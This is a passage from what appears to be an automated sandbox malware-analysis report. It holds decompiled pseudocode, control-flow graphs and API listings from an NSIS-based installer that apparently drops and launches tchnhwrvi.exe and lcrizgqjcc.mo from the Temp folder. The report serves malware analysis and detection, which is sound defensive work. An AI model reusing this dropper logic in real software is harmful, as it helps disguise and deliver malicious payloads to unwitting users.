						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(0x435800, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                    0x00403d1d
                    0x00403d26
                    0x00403d2d
                    0x00403d2f
                    0x00403d43
                    0x00403d55
                    0x00403d5e
                    0x00403d67
                    0x00403d6e
                    0x00403d73
                    0x00403d7a
                    0x00403d8d
                    0x00403d8d
                    0x00403d98
                    0x00403d31
                    0x00403d3c
                    0x00403d3c
                    0x00403d9d
                    0x00403db0
                    0x00403db5
                    0x00403dc6
                    0x00403e58
                    0x00403e60
                    0x00403e69
                    0x00403e69
                    0x00403e7f
                    0x00403e85
                    0x00403e93
                    0x00403f14
                    0x00403f1c
                    0x00403f26
                    0x00403f2b
                    0x00403f31
                    0x00403fbb
                    0x00403fc0
                    0x00403fc2
                    0x00403fde
                    0x00000000
                    0x00403fde
                    0x00403fc4
                    0x00403fca
                    0x00403fd2
                    0x00403fd2
                    0x00000000
                    0x00403fca
                    0x00403f3f
                    0x00403f4a
                    0x00403f4f
                    0x00403f51
                    0x00403f58
                    0x00403f58
                    0x00403f63
                    0x00403f6b
                    0x00403f6d
                    0x00403f6f
                    0x00403f78
                    0x00403f7b
                    0x00403f81
                    0x00403f81
                    0x00403fa0
                    0x00403fb1
                    0x00000000
                    0x00403fb6
                    0x00403f1e
                    0x00403f20
                    0x00000000
                    0x00403e95
                    0x00403e95
                    0x00403ea1
                    0x00403eab
                    0x00403eb1
                    0x00403eb6
                    0x00403ec5
                    0x00403fe3
                    0x00403fe3
                    0x00000000
                    0x00403fe3
                    0x00403ed4
                    0x00403f0f
                    0x00000000
                    0x00403f0f
                    0x00403dcc
                    0x00403dcc
                    0x00403dcf
                    0x00403dd1
                    0x00000000
                    0x00000000
                    0x00403ddf
                    0x00403df1
                    0x00403df6
                    0x00403dff
                    0x00000000
                    0x00000000
                    0x00403e05
                    0x00403e07
                    0x00403e14
                    0x00403e14
                    0x00403e1d
                    0x00403e23
                    0x00403e4b
                    0x00403e53
                    0x00000000
                    0x00403e35
                    0x00403e36
                    0x00403e3f
                    0x00403e45
                    0x00403e46
                    0x00000000
                    0x00403e46
                    0x00403e41
                    0x00403e43
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e43
                    0x00403e23

                    APIs
                      • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                      • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                    • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,?,?,?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7476FAA0), ref: 00403E18
                    • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,?,?,?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                    • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,?,00000000,?), ref: 00403E36
                    • LoadImageW.USER32 ref: 00403E7F
                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                    • RegisterClassW.USER32 ref: 00403EBC
                    • SystemParametersInfoW.USER32 ref: 00403ED4
                    • CreateWindowExW.USER32 ref: 00403F09
                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                    • GetClassInfoW.USER32 ref: 00403F6B
                    • GetClassInfoW.USER32 ref: 00403F78
                    • RegisterClassW.USER32 ref: 00403F81
                    • DialogBoxParamW.USER32 ref: 00403FA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                    • API String ID: 1975747703-810996470
                    • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                    • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                    • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                    • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 204memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                    C-Code - Quality: 98%
                    			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\PhviZrlpkW.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\jones\\Desktop\\PhviZrlpkW.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(0x436800, L"C:\\Users\\jones\\Desktop\\PhviZrlpkW.exe");
				E00406668(0x439000, E00405F83(0x436800));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                    0x004030db
                    0x004030de
                    0x004030e1
                    0x004030fb
                    0x00403100
                    0x00403113
                    0x00403118
                    0x0040311e
                    0x00000000
                    0x00403120
                    0x00403131
                    0x00403142
                    0x00403149
                    0x00403151
                    0x00403156
                    0x00403158
                    0x00403243
                    0x00403245
                    0x00403251
                    0x00000000
                    0x00000000
                    0x0040325a
                    0x00403286
                    0x0040328b
                    0x00403296
                    0x00403298
                    0x004032a9
                    0x004032c4
                    0x004032cd
                    0x004032d2
                    0x004032f1
                    0x00403301
                    0x00403313
                    0x00403318
                    0x00403320
                    0x0040332d
                    0x00403335
                    0x0040333a
                    0x0040333c
                    0x0040333c
                    0x00403344
                    0x00403344
                    0x00403347
                    0x00403348
                    0x00403348
                    0x0040334b
                    0x0040334d
                    0x0040334d
                    0x00403357
                    0x00403363
                    0x00000000
                    0x00403368
                    0x00000000
                    0x00403320
                    0x00000000
                    0x004032d4
                    0x00403262
                    0x00403274
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040315e
                    0x00403163
                    0x00403168
                    0x0040316c
                    0x00403173
                    0x0040317a
                    0x0040317c
                    0x0040317c
                    0x00403187
                    0x004032e0
                    0x00403322
                    0x00000000
                    0x00403322
                    0x00403194
                    0x00403214
                    0x00403218
                    0x0040321d
                    0x00000000
                    0x00403214
                    0x0040319d
                    0x004031a2
                    0x004031aa
                    0x004031d0
                    0x004031df
                    0x004031e5
                    0x004031ea
                    0x004031f0
                    0x00000000
                    0x00000000
                    0x004031fa
                    0x00403202
                    0x00403205
                    0x0040320a
                    0x0040320c
                    0x0040320c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004031fa
                    0x0040321e
                    0x00403224
                    0x00403230
                    0x00403230
                    0x00403233
                    0x00403239
                    0x00403239
                    0x00403241
                    0x00000000
                    0x00403241

                    APIs
                    • GetTickCount.KERNEL32 ref: 004030E4
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PhviZrlpkW.exe,00000400), ref: 00403100
                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PhviZrlpkW.exe,80000000,00000003), ref: 0040615C
                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\PhviZrlpkW.exe,C:\Users\user\Desktop\PhviZrlpkW.exe,80000000,00000003), ref: 00403149
                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\PhviZrlpkW.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                    • API String ID: 2803837635-966669455
                    • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                    • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                    • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                    • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                    C-Code - Quality: 77%
                    			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                    0x0040176f
                    0x00401776
                    0x00401782
                    0x00401785
                    0x0040178a
                    0x0040178d
                    0x00401794
                    0x004017b0
                    0x00401796
                    0x00401797
                    0x00401797
                    0x004017b6
                    0x004017bb
                    0x004017bb
                    0x004017bf
                    0x004017c2
                    0x004017c7
                    0x004017c9
                    0x004017cb
                    0x004017d0
                    0x004017d0
                    0x004017db
                    0x004017db
                    0x004017ec
                    0x004017ee
                    0x004017ee
                    0x004017ef
                    0x004017ef
                    0x004017f2
                    0x004017f5
                    0x004017f8
                    0x004017f8
                    0x004017ff
                    0x0040180e
                    0x00401813
                    0x00401816
                    0x00401819
                    0x00000000
                    0x00000000
                    0x0040181b
                    0x0040181e
                    0x00401874
                    0x00401879
                    0x004015b6
                    0x0040292e
                    0x0040292e
                    0x00402c2a
                    0x00402c2d
                    0x00402c2d
                    0x00000000
                    0x00401820
                    0x00401826
                    0x0040182d
                    0x0040183a
                    0x00401845
                    0x0040185b
                    0x0040185b
                    0x0040185e
                    0x00000000
                    0x00401864
                    0x00401864
                    0x00401865
                    0x00401882
                    0x00402c33
                    0x00402c33
                    0x00402c33
                    0x00401867
                    0x00401867
                    0x00401868
                    0x00401493
                    0x0040239d
                    0x0040239d
                    0x0040239d
                    0x00401865
                    0x0040185e
                    0x00402c35
                    0x00402c39
                    0x00402c39
                    0x00401892
                    0x00401897
                    0x004018a5
                    0x004018aa
                    0x004018b0
                    0x004018b4
                    0x004018b6
                    0x004018be
                    0x004018ca
                    0x004018b8
                    0x004018b8
                    0x004018bc
                    0x00000000
                    0x00000000
                    0x004018bc
                    0x004018d3
                    0x004018d9
                    0x004018db
                    0x00000000
                    0x004018e1
                    0x004018e1
                    0x004018e4
                    0x004018fc
                    0x004018e6
                    0x004018e9
                    0x004018f2
                    0x004018f2
                    0x00401901
                    0x00401906
                    0x00402398
                    0x00000000
                    0x00402398
                    0x00000000

                    APIs
                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                    • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00000000,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00436000,?,?,00000031), ref: 004017D5
                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$C:\Users\user\AppData\Local\Temp
                    • API String ID: 1941528284-311309491
                    • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                    • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                    • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                    • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                    C-Code - Quality: 100%
                    			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
